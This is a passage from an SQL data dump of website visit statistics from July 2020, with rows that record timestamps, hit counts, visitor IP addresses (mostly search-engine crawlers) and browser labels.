66.249.70.69','chrome'),(526789,1595917165,8,8,0,0,'185.11.82.228','other'),(526790,1595917512,1,1,0,0,'72.167.232.153','chrome'),(526791,1595917519,1,1,0,0,'66.249.64.33','chrome'),(526792,1595917669,5,5,0,0,'66.249.70.72','chrome'),(526793,1595918042,1,1,0,0,'66.249.70.69','chrome'),(526794,1595918245,1,1,0,0,'5.255.253.82','other'),(526795,1595918261,8,8,0,0,'185.11.82.228','other'),(526796,1595918289,1,1,0,0,'66.249.64.38','chrome'),(526797,1595919316,1,1,0,0,'198.38.82.11','chrome'),(526798,1595919325,2,2,0,0,'66.249.70.70','chrome'),(526799,1595919458,8,8,0,0,'185.11.82.228','other'),(526800,1595919973,1,1,0,0,'66.249.64.33','chrome'),(526801,1595919991,1,1,0,0,'66.249.70.72','chrome'),(526802,1595919997,3,3,0,0,'66.249.70.69','chrome'),(526803,1595920520,3,3,0,0,'186.233.144.213','chrome'),(526804,1595920796,8,8,0,0,'185.11.82.228','other'),(526805,1595920902,1,1,0,0,'198.46.81.57','chrome'),(526806,1595920975,1,1,0,0,'46.21.198.188','chrome'),(526807,1595921137,2,2,0,0,'66.249.70.72','chrome'),(526808,1595921313,1,1,0,0,'17.58.99.84','other'),(526809,1595921565,4,4,0,0,'66.249.70.70','chrome'),(526810,1595921819,1,1,0,0,'66.249.64.38','chrome'),(526811,1595921970,2,2,0,0,'66.249.70.69','chrome'),(526812,1595922022,8,8,0,0,'185.11.82.228','other'),(526813,1595922084,19,19,0,0,'173.231.59.209','other'),(526814,1595922482,2,2,0,0,'66.249.64.33','chrome'),(526815,1595922591,1,1,0,0,'207.46.13.98','other'),(526816,1595922696,1,1,0,0,'178.154.200.222','other'),(526817,1595922997,43,43,0,0,'173.231.59.209','other'),(526818,1595923017,5,5,0,0,'66.249.70.70','chrome'),(526819,1595923108,1,1,0,0,'8.29.198.26','other'),(526820,1595923213,1,1,0,0,'66.249.64.38','chrome'),(526821,1595923278,8,8,0,0,'185.11.82.228','other'),(526822,1595923396,1,1,0,0,'66.249.64.33','chrome'),(526823,1595923580,3,3,0,0,'66.249.70.72','chrome'),(526824,1595923990,1,1,0,0,'8.29.198.27','other'),(526825,1595924252,1,1,0,0,'91.196.178.72','chrome'),(526826,1595924285,22,22,0,0,'173.231.59.209','other'),(526827,1595924520,1,1,0,0,'37.73.16.120','chrome'),(526828,1595924561,8,8,0,0,'185.11.82.228','other'),(526829,1595924591,1,1,0,0,'157.55.39.81','other'),(526830,1595924900,3,3,0,0,'66.249.70.70','chrome'),(526831,1595925038,1,1,0,0,'66.249.64.36','chrome'),(526832,1595925052,1,1,0,0,'66.249.70.69','chrome'),(526833,1595925141,1,1,0,0,'66.249.70.72','chrome'),(526834,1595925213,25,25,0,0,'173.231.59.209','other'),(526835,1595925613,1,1,0,0,'66.249.64.38','chrome'),(526836,1595925837,8,8,0,0,'185.11.82.228','other'),(526837,1595926123,28,28,0,0,'173.231.59.209','other'),(526838,1595926196,2,1,1,0,'66.249.70.70',''),(526839,1595926342,1,1,0,0,'66.249.64.33','chrome'),(526840,1595926492,1,1,0,0,'17.58.99.84','other'),(526841,1595926697,4,4,0,0,'66.249.70.69','chrome'),(526842,1595926796,6,6,0,0,'66.249.70.70','chrome'),(526843,1595926849,3,3,0,0,'66.249.70.72','chrome'),(526844,1595927033,21,21,0,0,'173.231.59.209','other'),(526845,1595927165,8,8,0,0,'185.11.82.228','other'),(526846,1595927383,2,2,0,0,'213.180.203.16','other'),(526847,1595927408,1,1,0,0,'66.249.64.33','chrome'),(526848,1595927590,1,1,0,0,'178.154.200.236','chrome'),(526849,1595927737,1,1,0,0,'17.58.99.84','other'),(526850,1595927760,1,1,0,0,'178.154.200.222','other'),(526851,1595927794,3,3,0,0,'66.249.70.69','chrome'),(526852,1595927935,27,27,0,0,'173.231.59.209','other'),(526853,1595928031,1,1,0,0,'193.109.85.13','chrome'),(526854,1595928528,8,8,0,0,'185.11.82.228','other'),(526855,1595928555,1,1,0,0,'66.249.70.70','chrome'),(526856,1595928717,1,1,0,0,'66.249.64.38','chrome'),(526857,1595928899,30,30,0,0,'173.231.59.209','other'),(526858,1595928900,1,1,0,0,'207.46.13.139','other'),(526859,1595929067,1,1,0,0,'66.249.70.72','chrome'),(526860,1595929121,2,2,0,0,'66.249.70.69','chrome'),(526861,1595929501,1,1,0,0,'95.158.43.212','chrome'),(526862,1595929648,2,2,0,0,'157.55.39.81','other'),(526863,1595929903,8,8,0,0,'185.11.82.228','other'),(526864,1595929942,31,31,0,0,'173.231.59.209','other'),(526865,1595929943,1,1,0,0,'193.109.85.13','chrome'),(526866,1595930294,1,1,0,0,'66.249.64.36','chrome'),(526867,1595930412,1,1,0,0,'66.249.70.70','chrome'),(526868,1595930425,1,1,0,0,'213.108.42.106','chrome'),(526869,1595930456,1,1,0,0,'66.249.70.69','chrome'),(526870,1595930832,1,1,0,0,'157.55.39.81','other'),(526871,1595930840,1,1,0,0,'207.46.13.98','other'),(526872,1595930914,30,30,0,0,'173.231.59.209','other'),(526873,1595931266,1,1,0,0,'31.13.127.13','other'),(526874,1595931278,8,8,0,0,'185.11.82.228','other'),(526875,1595931511,1,1,0,0,'66.249.64.38','chrome'),(526876,1595931973,28,28,0,0,'173.231.59.209','other'),(526877,1595932669,8,8,0,0,'185.11.82.228','other'),(526878,1595932681,1,1,0,0,'157.55.39.81','other'),(526879,1595932910,32,32,0,0,'173.231.59.209','other'),(526880,1595933066,1,1,0,0,'157.55.39.128','other'),(526881,1595933173,1,1,0,0,'89.44.234.94','chrome'),(526882,1595933718,2,2,0,0,'88.99.26.12','chrome'),(526883,1595933940,1,1,0,0,'8.29.198.26','other'),(526884,1595934137,8,8,0,0,'185.11.82.228','other'),(526885,1595934249,30,30,0,0,'173.231.59.209','other'),(526886,1595934310,1,1,0,0,'178.162.204.14','chrome'),(526887,1595934577,1,1,0,0,'109.74.154.72','chrome'),(526888,1595934754,12,12,0,0,'66.147.238.141','chrome'),(526889,1595934812,1,1,0,0,'8.29.198.25','other'),(526890,1595935376,60,60,0,0,'173.231.59.209','other'),(526891,1595935453,1,1,0,0,'157.55.39.81','other'),(526892,1595935481,2,2,0,0,'66.249.70.69','chrome'),(526893,1595935527,8,8,0,0,'185.11.82.228','other'),(526894,1595935722,1,1,0,0,'66.249.64.36','chrome'),(526895,1595936170,1,1,0,0,'66.249.70.70','chrome'),(526896,1595936221,1,1,0,0,'66.249.70.72','chrome'),(526897,1595936472,1,1,0,0,'178.208.83.57','chrome'),(526898,1595936479,33,33,0,0,'173.231.59.209','other'),(526899,1595936913,1,1,0,0,'66.249.64.38','chrome'),(526900,1595936923,8,8,0,0,'185.11.82.228','other'),(526901,1595937135,1,1,0,0,'66.249.70.72','chrome'),(526902,1595937503,19,19,0,0,'173.231.59.209','other'),(526903,1595937612,1,1,0,0,'66.249.70.69','chrome'),(526904,1595938383,8,8,0,0,'185.11.82.228','other'),(526905,1595938406,8,8,0,0,'173.231.59.209','other'),(526906,1595939037,1,1,0,0,'66.249.70.72','chrome'),(526907,1595939178,1,1,0,0,'207.46.13.139','other'),(526908,1595939282,2,2,0,0,'66.249.70.70','chrome'),(526909,1595939554,49,49,0,0,'173.231.59.209','other'),(526910,1595939584,1,1,0,0,'195.248.240.19','chrome'),(526911,1595939655,1,1,0,0,'66.249.70.69','chrome'),(526912,1595939897,8,8,0,0,'185.11.82.228','other'),(526913,1595939944,1,1,0,0,'213.180.203.16','other'),(526914,1595940113,1,1,0,0,'17.58.99.84','other'),(526915,1595940219,1,1,0,0,'91.196.178.77','chrome'),(526916,1595940455,41,41,0,0,'173.231.59.209','other'),(526917,1595940858,2,2,0,0,'66.249.70.69','chrome'),(526918,1595941058,1,1,0,0,'66.249.64.33','chrome'),(526919,1595941105,1,1,0,0,'66.249.70.70','chrome'),(526920,1595941261,2,2,0,0,'116.202.203.237','other'),(526921,1595941263,1,1,0,0,'116.202.203.237','chrome'),(526922,1595941345,8,8,0,0,'185.11.82.228','other'),(526923,1595941729,1,1,0,0,'157.55.39.81','other'),(526924,1595941830,30,30,0,0,'173.231.59.209','other'),(526925,1595942178,4,4,0,0,'66.249.70.70','chrome'),(526926,1595942557,24,24,0,0,'66.249.70.69','chrome'),(526927,1595942569,3,3,0,0,'66.249.64.33','chrome'),(526928,1595942595,1,1,0,0,'207.46.13.98','other'),(526929,1595942634,5,5,0,0,'66.249.70.72','chrome'),(526930,1595942714,2,2,0,0,'66.249.64.36','chrome'),(526931,1595942728,1,1,0,0,'157.55.39.81','other'),(526932,1595942768,34,34,0,0,'173.231.59.209','other'),(526933,1595942788,2,2,0,0,'66.249.64.38','chrome'),(526934,1595942983,8,8,0,0,'185.11.82.228','other'),(526935,1595943172,6,6,0,0,'66.249.70.70','chrome'),(526936,1595943514,2,2,0,0,'66.249.70.69','chrome'),(526937,1595943601,3,3,0,0,'66.249.70.72','chrome'),(526938,1595943670,26,26,0,0,'173.231.59.209','other'),(526939,1595943776,1,1,0,0,'207.46.13.98','other'),(526940,1595943864,1,1,0,0,'157.55.39.81','other'),(526941,1595943958,1,1,0,0,'66.249.64.33','chrome'),(526942,1595944425,8,8,0,0,'185.11.82.228','other'),(526943,1595944480,3,3,0,0,'66.249.70.69','chrome'),(526944,1595944515,1,1,0,0,'37.53.228.106','chrome'),(526945,1595944641,1,1,0,0,'173.231.59.209','other'),(526946,1595944681,2,1,1,0,'66.249.70.70',''),(526947,1595944748,1,1,0,0,'62.80.185.138','chrome'),(526948,1595944772,2,2,0,0,'8.29.198.27','other'),(526949,1595944888,3,3,0,0,'66.249.70.70','chrome'),(526950,1595945145,1,1,0,0,'66.249.64.38','chrome'),(526951,1595945400,1,1,0,0,'157.55.39.81','other'),(526952,1595945560,17,17,0,0,'173.231.59.209','other'),(526953,1595945789,1,1,0,0,'35.154.65.246','chrome'),(526954,1595945823,1,1,0,0,'207.46.13.98','other'),(526955,1595945858,8,8,0,0,'185.11.82.228','other'),(526956,1595945912,2,2,0,0,'66.249.70.72','chrome'),(526957,1595946041,2,2,0,0,'66.249.70.70','chrome'),(526958,1595946052,1,1,0,0,'31.177.95.94','chrome'),(526959,1595946063,1,1,0,0,'51.68.11.223','chrome'),(526960,1595946265,1,1,0,0,'66.249.70.69','chrome'),(526961,1595946489,28,28,0,0,'173.231.59.209','other'),(526962,1595946913,2,2,0,0,'66.249.70.72','chrome'),(526963,1595947139,2,2,0,0,'66.249.64.36','chrome'),(526964,1595947333,8,8,0,0,'185.11.82.228','other'),(526965,1595947402,30,30,0,0,'173.231.59.209','other'),(526966,1595947591,2,2,0,0,'66.249.70.69','chrome'),(526967,1595947672,1,1,0,0,'17.58.99.84','other'),(526968,1595947776,1,1,0,0,'77.221.130.155','chrome'),(526969,1595948139,6,6,0,0,'43.243.82.132','chrome'),(526970,1595948438,1,1,0,0,'66.249.70.72','chrome'),(526971,1595948442,30,30,0,0,'173.231.59.209','other'),(526972,1595948491,1,1,0,0,'66.249.70.70','chrome'),(526973,1595948639,1,1,0,0,'66.249.70.69','chrome'),(526974,1595948735,2,2,0,0,'66.249.64.33','chrome'),(526975,1595948764,8,8,0,0,'185.11.82.228','other'),(526976,1595948892,1,1,0,0,'209.17.96.146','other'),(526977,1595949002,2,2,0,0,'185.21.41.145','chrome'),(526978,1595949405,1,1,0,0,'157.55.39.81','other'),(526979,1595949463,1,1,0,0,'192.188.46.4','chrome'),(526980,1595949471,30,30,0,0,'173.231.59.209','other'),(526981,1595950203,8,8,0,0,'185.11.82.228','other'),(526982,1595950662,20,20,0,0,'173.231.59.209','other'),(526983,1595950807,2,2,0,0,'66.249.70.72','chrome'),(526984,1595950865,1,1,0,0,'66.249.64.36','chrome'),(526985,1595950913,1,1,0,0,'66.249.70.69','chrome'),(526986,1595951417,1,1,0,0,'66.249.70.70','chrome'),(526987,1595951534,1,1,0,0,'157.55.39.81','other'),(526988,1595951539,1,1,0,0,'207.46.13.139','other'),(526989,1595951688,8,8,0,0,'185.11.82.228','other'),(526990,1595951807,25,25,0,0,'173.231.59.209','other'),(526991,1595952566,1,1,0,0,'47.240.32.191','chrome'),(526992,1595952721,24,24,0,0,'173.231.59.209','other'),(526993,1595952941,2,2,0,0,'66.249.70.69','chrome'),(526994,1595953105,8,8,0,0,'185.11.82.228','other'),(526995,1595953325,1,1,0,0,'178.154.200.222','other'),(526996,1595953846,1,1,0,0,'157.55.39.81','other'),(526997,1595954179,1,1,0,0,'17.58.99.84','other'),(526998,1595954213,1,1,0,0,'66.249.64.33','chrome'),(526999,1595954536,2,2,0,0,'192.115.100.180','chrome'),(527000,1595954605,8,8,0,0,'185.11.82.228','other'),(527001,1595954810,60,60,0,0,'173.231.59.209','other'),(527002,1595954975,1,0,1,0,'66.249.70.69',''),(527003,1595955598,1,1,0,0,'8.29.198.25','other'),(527004,1595955629,1,1,0,0,'157.55.39.81','other'),(527005,1595955729,1,1,0,0,'207.46.13.139','other'),(527006,1595956120,8,8,0,0,'185.11.82.228','other'),(527007,1595956167,1,0,1,0,'66.249.70.72',''),(527008,1595956218,30,30,0,0,'173.231.59.209','other'),(527009,1595956466,1,1,0,0,'8.29.198.26','other'),(527010,1595956661,1,1,0,0,'157.55.39.81','other'),(527011,1595957145,2,2,0,0,'66.249.70.72','chrome'),(527012,1595957222,1,1,0,0,'66.249.64.33','chrome'),(527013,1595957225,16,16,0,0,'173.231.59.209','other'),(527014,1595957255,1,1,0,0,'149.202.196.101','chrome'),(527015,1595957294,2,2,0,0,'67.205.40.241','chrome'),(527016,1595957631,8,8,0,0,'185.11.82.228','other'),(527017,1595958374,1,1,0,0,'66.249.64.36','chrome'),(527018,1595958853,1,1,0,0,'93.159.230.28','chrome'),(527019,1595958915,2,2,0,0,'66.249.70.70','chrome'),(527020,1595959260,8,8,0,0,'185.11.82.228','other'),(527021,1595959461,1,1,0,0,'91.196.178.88','firefox'),(527022,1595959814,1,1,0,0,'66.249.70.69','chrome'),(527023,1595959979,1,1,0,0,'207.46.13.98','other'),(527024,1595959991,1,1,0,0,'66.249.70.70','chrome'),(527025,1595960677,1,1,0,0,'17.58.99.84','other'),(527026,1595960833,1,1,0,0,'91.196.178.167','chrome'),(527027,1595960889,8,8,0,0,'185.11.82.228','other'),(527028,1595961411,1,1,0,0,'66.249.64.38','chrome'),(527029,1595961976,1,1,0,0,'66.249.70.70','chrome'),(527030,1595962043,1,1,0,0,'66.249.70.72','chrome'),(527031,1595962240,1,1,0,0,'207.46.13.129','other'),(527032,1595962509,8,8,0,0,'185.11.82.228','other'),(527033,1595963892,2,2,0,0,'157.55.39.81','other'),(527034,1595964275,8,8,0,0,'185.11.82.228','other'),(527035,1595965075,1,1,0,0,'66.249.70.70','chrome'),(527036,1595965501,1,1,0,0,'66.249.70.69','chrome'),(527037,1595965615,1,1,0,0,'37.73.190.33','chrome'),(527038,1595965955,8,8,0,0,'185.11.82.228','other'),(527039,1595966037,1,1,0,0,'66.249.70.72','chrome'),(527040,1595966080,1,1,0,0,'91.196.178.19','chrome'),(527041,1595966432,1,1,0,0,'8.29.198.25','other'),(527042,1595967038,1,1,0,0,'66.249.70.70','chrome'),(527043,1595967285,1,1,0,0,'8.29.198.27','other'),(527044,1595967299,1,1,0,0,'66.249.64.36','chrome'),(527045,1595967603,8,8,0,0,'185.11.82.228','other'),(527046,1595967952,1,1,0,0,'157.55.39.228','other'),(527047,1595968204,1,1,0,0,'66.249.70.70','chrome'),(527048,1595968369,1,1,0,0,'77.74.177.113','chrome'),(527049,1595968731,1,1,0,0,'37.120.203.72','firefox'),(527050,1595968952,1,1,0,0,'66.249.70.72','chrome'),(527051,1595969051,1,1,0,0,'178.154.200.222','other'),(527052,1595969203,8,8,0,0,'185.11.82.228','other'),(527053,1595970497,1,1,0,0,'66.249.64.36','chrome'),(527054,1595970581,2,2,0,0,'66.249.70.72','chrome'),(527055,1595970779,8,8,0,0,'185.11.82.228','other'),(527056,1595971011,1,1,0,0,'159.224.225.228','chrome'),(527057,1595971055,2,2,0,0,'17.58.99.84','other'),(527058,1595971577,1,1,0,0,'207.46.13.98','other'),(527059,1595972044,1,1,0,0,'66.249.70.69','chrome'),(527060,1595972330,8,8,0,0,'185.11.82.228','other'),(527061,1595972598,1,1,0,0,'66.249.70.70','chrome'),(527062,1595973145,1,1,0,0,'66.249.70.72','chrome'),(527063,1595973369,60,60,0,0,'173.231.59.209','other'),(527064,1595973857,8,8,0,0,'185.11.82.228','other'),(527065,1595974111,2,2,0,0,'66.249.70.70','chrome'),(527066,1595974156,1,1,0,0,'66.249.70.72','chrome'),(527067,1595974526,60,60,0,0,'173.231.59.209','other'),(527068,1595974963,2,2,0,0,'66.249.64.33','chrome'),(527069,1595975467,1,1,0,0,'66.249.70.70','chrome'),(527070,1595975500,1,1,0,0,'66.249.70.69','chrome'),(527071,1595975533,3,3,0,0,'66.249.70.72','chrome'),(527072,1595975655,75,75,0,0,'173.231.59.209','other'),(527073,1595975759,8,8,0,0,'185.11.82.228','other'),(527074,1595976556,67,67,0,0,'173.231.59.209','other'),(527075,1595976892,1,1,0,0,'66.249.70.69','chrome'),(527076,1595977253,1,0,1,0,'66.249.70.72',''),(527077,1595977257,1,1,0,0,'8.29.198.26','other'),(527078,1595977292,1,1,0,0,'157.55.39.233','other'),(527079,1595977388,5,5,0,0,'66.249.70.70','chrome'),(527080,1595977520,52,52,0,0,'173.231.59.209','other'),(527081,1595977882,8,8,0,0,'185.11.82.228','other'),(527082,1595978116,1,1,0,0,'8.29.198.25','other'),(527083,1595978425,54,54,0,0,'173.231.59.209','other'),(527084,1595978536,1,1,0,0,'66.249.70.72','chrome'),(527085,1595979112,2,2,0,0,'66.249.70.69','chrome'),(527086,1595979327,71,71,0,0,'173.231.59.209','other'),(527087,1595979485,2,2,0,0,'66.249.70.72','chrome'),(527088,1595980027,8,8,0,0,'185.11.82.228','other'),(527089,1595980426,53,53,0,0,'173.231.59.209','other'),(527090,1595980508,1,1,0,0,'62.205.134.182','other'),(527091,1595981220,2,2,0,0,'66.249.70.72','chrome'),(527092,1595981247,2,2,0,0,'66.249.70.70','chrome'),(527093,1595981332,25,25,0,0,'173.231.59.209','other'),(527094,1595981893,1,1,0,0,'207.46.13.98','other'),(527095,1595981906,1,1,0,0,'66.249.70.69','chrome'),(527096,1595982129,8,8,0,0,'185.11.82.228','other'),(527097,1595982244,57,57,0,0,'173.231.59.209','other'),(527098,1595983103,1,1,0,0,'66.249.70.72','chrome'),(527099,1595983145,54,54,0,0,'173.231.59.209','other'),(527100,1595983190,2,2,0,0,'66.249.70.70','chrome'),(527101,1595983311,3,3,0,0,'66.249.70.69','chrome'),(527102,1595984334,8,8,0,0,'185.11.82.228','other'),(527103,1595984349,1,1,0,0,'66.249.64.38','chrome'),(527104,1595984442,56,56,0,0,'173.231.59.209','other'),(527105,1595984645,2,2,0,0,'66.249.70.69','chrome'),(527106,1595984815,2,2,0,0,'66.249.70.72','chrome'),(527107,1595985007,1,1,0,0,'66.249.70.70','chrome'),(527108,1595985167,1,1,0,0,'66.249.64.36','chrome'),(527109,1595985343,49,49,0,0,'173.231.59.209','other'),(527110,1595985716,1,1,0,0,'207.46.13.139','other'),(527111,1595985901,1,1,0,0,'157.55.39.81','other'),(527112,1595985918,1,1,0,0,'66.249.70.72','chrome'),(527113,1595986248,25,25,0,0,'173.231.59.209','other'),(527114,1595986485,8,8,0,0,'185.11.82.228','other'),(527115,1595986506,1,1,0,0,'66.249.64.33','chrome'),(527116,1595987498,3,3,0,0,'66.249.70.70','chrome'),(527117,1595988086,1,1,0,0,'8.29.198.27','other'),(527118,1595988164,3,3,0,0,'66.249.70.72','chrome'),(527119,1595988719,8,8,0,0,'185.11.82.228','other'),(527120,1595988946,1,1,0,0,'8.29.198.25','other'),(527121,1595989139,1,1,0,0,'157.55.39.81','other'),(527122,1595989214,6,6,0,0,'190.233.196.126','chrome'),(527123,1595989343,1,1,0,0,'66.249.70.70','chrome'),(527124,1595989459,1,1,0,0,'66.249.64.38','chrome'),(527125,1595990063,1,1,0,0,'66.249.70.72','chrome'),(527126,1595990190,2,2,0,0,'66.249.70.69','chrome'),(527127,1595990297,1,1,0,0,'17.58.99.84','other'),(527128,1595990531,3,3,0,0,'66.249.70.70','chrome'),(527129,1595990730,1,1,0,0,'66.249.64.36','chrome'),(527130,1595990892,1,1,0,0,'109.70.106.130','other'),(527131,1595990921,8,8,0,0,'185.11.82.228','other'),(527132,1595991249,1,1,0,0,'66.249.70.72','chrome'),(527133,1595991276,1,1,0,0,'157.55.39.233','other'),(527134,1595991645,2,2,0,0,'66.249.70.70','chrome'),(527135,1595991775,2,2,0,0,'157.55.39.81','other'),(527136,1595992144,1,1,0,0,'66.249.64.36','chrome'),(527137,1595992464,1,1,0,0,'66.249.70.72','chrome'),(527138,1595992719,2,2,0,0,'66.249.70.69','chrome'),(527139,1595992802,1,1,0,0,'157.55.39.81','other'),(527140,1595992807,1,1,0,0,'207.46.13.98','other'),(527141,1595992861,1,1,0,0,'157.55.39.233','other'),(527142,1595993129,8,8,0,0,'185.11.82.228','other'),(527143,1595993332,3,3,0,0,'157.55.39.84','other'),(527144,1595994097,2,2,0,0,'66.249.70.70','chrome'),(527145,1595994477,1,1,0,0,'157.55.39.84','other'),(527146,1595994827,1,1,0,0,'66.249.64.36','chrome'),(527147,1595994968,1,1,0,0,'66.249.70.72','chrome'),(527148,1595995311,8,8,0,0,'185.11.82.228','other'),(527149,1595995542,1,1,0,0,'207.46.13.98','other'),(527150,1595995549,2,2,0,0,'157.55.39.233','other'),(527151,1595995601,1,1,0,0,'157.55.39.81','other'),(527152,1595995679,1,1,0,0,'157.55.39.84','other'),(527153,1595995908,1,1,0,0,'66.249.70.70','chrome'),(527154,1595996157,1,1,0,0,'66.249.64.38','chrome'),(527155,1595996224,3,3,0,0,'66.249.70.72','chrome'),(527156,1595996539,1,1,0,0,'66.249.70.69','chrome'),(527157,1595996613,1,1,0,0,'131.220.6.152','chrome'),(527158,1595997226,2,1,1,0,'66.249.70.72',''),(527159,1595997977,8,8,0,0,'185.11.82.228','other'),(527160,1595998140,3,3,0,0,'66.249.70.69','chrome'),(527161,1595998429,1,1,0,0,'62.205.134.182','other'),(527162,1595998564,2,2,0,0,'66.249.70.70','chrome'),(527163,1595998916,1,1,0,0,'8.29.198.25','other'),(527164,1595999044,8,8,0,0,'185.11.82.228','other'),(527165,1595999146,4,4,0,0,'66.249.70.72','chrome'),(527166,1595999155,3,3,0,0,'66.249.70.69','chrome'),(527167,1595999173,1,1,0,0,'128.199.105.100','chrome'),(527168,1595999500,1,1,0,0,'66.249.70.70','chrome'),(527169,1595999769,1,1,0,0,'8.29.198.26','other'),(527170,1596000142,8,8,0,0,'185.11.82.228','other'),(527171,1596000523,2,2,0,0,'66.249.70.69','chrome'),(527172,1596000838,1,1,0,0,'66.249.64.33','chrome'),(527173,1596000916,1,1,0,0,'192.157.230.165','chrome'),(527174,1596001117,1,1,0,0,'157.55.39.84','other'),(527175,1596001235,8,8,0,0,'185.11.82.228','other'),(527176,1596001242,1,1,0,0,'91.196.178.189','chrome'),(527177,1596001458,3,3,0,0,'66.249.70.69','chrome'),(527178,1596001625,1,1,0,0,'66.249.70.72','chrome'),(527179,1596001903,1,1,0,0,'91.196.178.72','chrome'),(527180,1596002333,8,8,0,0,'185.11.82.228','other'),(527181,1596002590,2,2,0,0,'66.249.70.69','chrome'),(527182,1596003106,1,1,0,0,'66.249.70.70','chrome'),(527183,1596003167,1,1,0,0,'46.201.57.83','chrome'),(527184,1596003485,8,8,0,0,'185.11.82.228','other'),(527185,1596003768,3,3,0,0,'66.249.70.72','chrome'),(527186,1596004014,2,2,0,0,'66.249.70.70','chrome'),(527187,1596004241,2,2,0,0,'66.249.64.33','chrome'),(527188,1596004259,1,1,0,0,'207.46.13.139','other'),(527189,1596004634,8,8,0,0,'185.11.82.228','other'),(527190,1596004782,2,2,0,0,'66.249.70.72','chrome'),(527191,1596004786,2,2,0,0,'66.249.70.69','chrome'),(527192,1596005023,2,2,0,0,'66.249.70.70','chrome'),(527193,1596005752,3,3,0,0,'66.249.70.72','chrome'),(527194,1596005844,8,8,0,0,'185.11.82.228','other'),(527195,1596005860,3,3,0,0,'66.249.70.69','chrome'),(527196,1596007057,8,8,0,0,'185.11.82.228','other'),(527197,1596007533,10,10,0,0,'91.185.71.42','chrome'),(527198,1596007551,1,1,0,0,'89.46.109.174','chrome'),(527199,1596007588,1,1,0,0,'91.196.178.72','chrome'),(527200,1596007659,1,1,0,0,'207.46.13.98','other'),(527201,1596008022,2,2,0,0,'66.249.70.70','chrome'),(527202,1596008270,8,8,0,0,'185.11.82.228','other'),(527203,1596008343,2,2,0,0,'157.55.39.233','other'),(527204,1596008392,1,1,0,0,'66.249.64.33','chrome'),(527205,1596008486,1,1,0,0,'207.46.13.139','other'),(527206,1596009175,1,1,0,0,'94.20.62.62','chrome'),(527207,1596009497,8,8,0,0,'185.11.82.228','other'),(527208,1596009746,2,2,0,0,'8.29.198.25','other'),(527209,1596010796,8,8,0,0,'185.11.82.228','other'),(527210,1596011098,1,1,0,0,'91.196.177.178','chrome'),(527211,1596011269,1,1,0,0,'17.58.99.84','other'),(527212,1596011379,4,4,0,0,'42.201.253.166','chrome'),(527213,1596012095,1,1,0,0,'157.55.39.134','other'),(527214,1596012099,8,8,0,0,'185.11.82.228','other'),(527215,1596012337,4,4,0,0,'42.201.253.166','chrome'),(527216,1596012467,1,1,0,0,'66.249.70.70','chrome'),(527217,1596012589,3,3,0,0,'156.222.224.162','chrome'),(527218,1596013190,1,1,0,0,'31.13.127.15','other'),(527219,1596013393,8,8,0,0,'185.11.82.228','other'),(527220,1596013598,1,1,0,0,'217.171.147.164','chrome'),(527221,1596013601,1,1,0,0,'66.249.70.69','chrome'),(527222,1596013975,1,1,0,0,'91.196.178.72','chrome'),(527223,1596014191,1,1,0,0,'66.249.70.72','chrome'),(527224,1596014432,1,1,0,0,'157.55.39.84','other'),(527225,1596014724,8,8,0,0,'185.11.82.228','other'),(527226,1596014800,1,1,0,0,'66.249.64.33','chrome'),(527227,1596015336,1,1,0,0,'66.249.70.69','chrome'),(527228,1596015401,2,2,0,0,'17.58.99.84','other'),(527229,1596015494,1,1,0,0,'157.55.39.84','other'),(527230,1596015519,1,1,0,0,'66.249.70.70','chrome'),(527231,1596015702,1,1,0,0,'66.249.64.36','chrome'),(527232,1596016005,8,8,0,0,'185.11.82.228','other'),(527233,1596016028,1,1,0,0,'207.46.13.98','other'),(527234,1596016037,2,2,0,0,'91.196.178.189','chrome'),(527235,1596017218,1,1,0,0,'66.249.64.36','chrome'),(527236,1596017242,1,1,0,0,'207.46.13.139','other'),(527237,1596017300,1,1,0,0,'66.249.70.72','chrome'),(527238,1596017321,8,8,0,0,'185.11.82.228','other'),(527239,1596017574,1,1,0,0,'66.249.70.70','chrome'),(527240,1596017654,1,1,0,0,'18.222.186.51','chrome'),(527241,1596018619,8,8,0,0,'185.11.82.228','other'),(527242,1596018738,2,2,0,0,'66.249.70.72','chrome'),(527243,1596019024,1,1,0,0,'91.196.178.169','other'),(527244,1596019409,1,1,0,0,'157.55.39.84','other'),(527245,1596019927,8,8,0,0,'185.11.82.228','other'),(527246,1596020091,2,2,0,0,'66.249.70.72','chrome'),(527247,1596020575,1,1,0,0,'8.29.198.26','other'),(527248,1596020706,3,3,0,0,'66.249.70.69','chrome'),(527249,1596020757,1,1,0,0,'17.58.99.84','other'),(527250,1596021246,8,8,0,0,'185.11.82.228','other'),(527251,1596021379,2,2,0,0,'95.213.141.126','opera'),(527252,1596021417,1,1,0,0,'8.29.198.27','other'),(527253,1596021689,1,1,0,0,'109.74.154.72','chrome'),(527254,1596021953,1,1,0,0,'207.46.13.139','other'),(527255,1596021984,1,1,0,0,'157.55.39.84','other'),(527256,1596022213,1,1,0,0,'37.73.84.219','chrome'),(527257,1596022597,8,8,0,0,'185.11.82.228','other'),(527258,1596022743,1,1,0,0,'66.249.70.70','chrome'),(527259,1596023101,1,1,0,0,'176.111.33.18','firefox'),(527260,1596023362,1,1,0,0,'51.15.231.66','chrome'),(527261,1596023466,1,1,0,0,'207.46.13.98','other'),(527262,1596023624,1,1,0,0,'17.58.99.84','other'),(527263,1596023916,1,1,0,0,'66.249.70.70','chrome'),(527264,1596023944,8,8,0,0,'185.11.82.228','other'),(527265,1596023945,4,4,0,0,'52.189.233.48','chrome'),(527266,1596023949,2,2,0,0,'66.249.70.69','chrome'),(527267,1596024203,1,1,0,0,'88.155.21.204','chrome'),(527268,1596024595,1,1,0,0,'37.73.84.219','chrome'),(527269,1596024879,1,1,0,0,'91.196.178.72','chrome'),(527270,1596025386,8,8,0,0,'185.11.82.228','other'),(527271,1596025475,1,1,0,0,'66.249.70.72','chrome'),(527272,1596025575,2,2,0,0,'66.249.70.70','chrome'),(527273,1596025719,5,5,0,0,'66.249.70.69','chrome'),(527274,1596025990,1,1,0,0,'91.142.175.25','chrome'),(527275,1596026245,1,1,0,0,'207.46.13.139','other'),(527276,1596026247,1,1,0,0,'91.196.178.72','chrome'),(527277,1596026777,8,8,0,0,'185.11.82.228','other'),(527278,1596026877,1,1,0,0,'17.58.99.84','other'),(527279,1596027418,3,3,0,0,'66.249.70.69','chrome'),(527280,1596027695,1,1,0,0,'66.249.64.33','chrome'),(527281,1596027869,1,1,0,0,'91.196.178.72','chrome'),(527282,1596027938,2,2,0,0,'66.249.70.72','chrome'),(527283,1596028081,2,2,0,0,'66.249.70.70','chrome'),(527284,1596028166,8,8,0,0,'185.11.82.228','other'),(527285,1596028334,4,4,0,0,'66.249.70.69','chrome'),(527286,1596028711,1,1,0,0,'13.66.139.0','other'),(527287,1596028917,1,1,0,0,'207.46.13.98','other'),(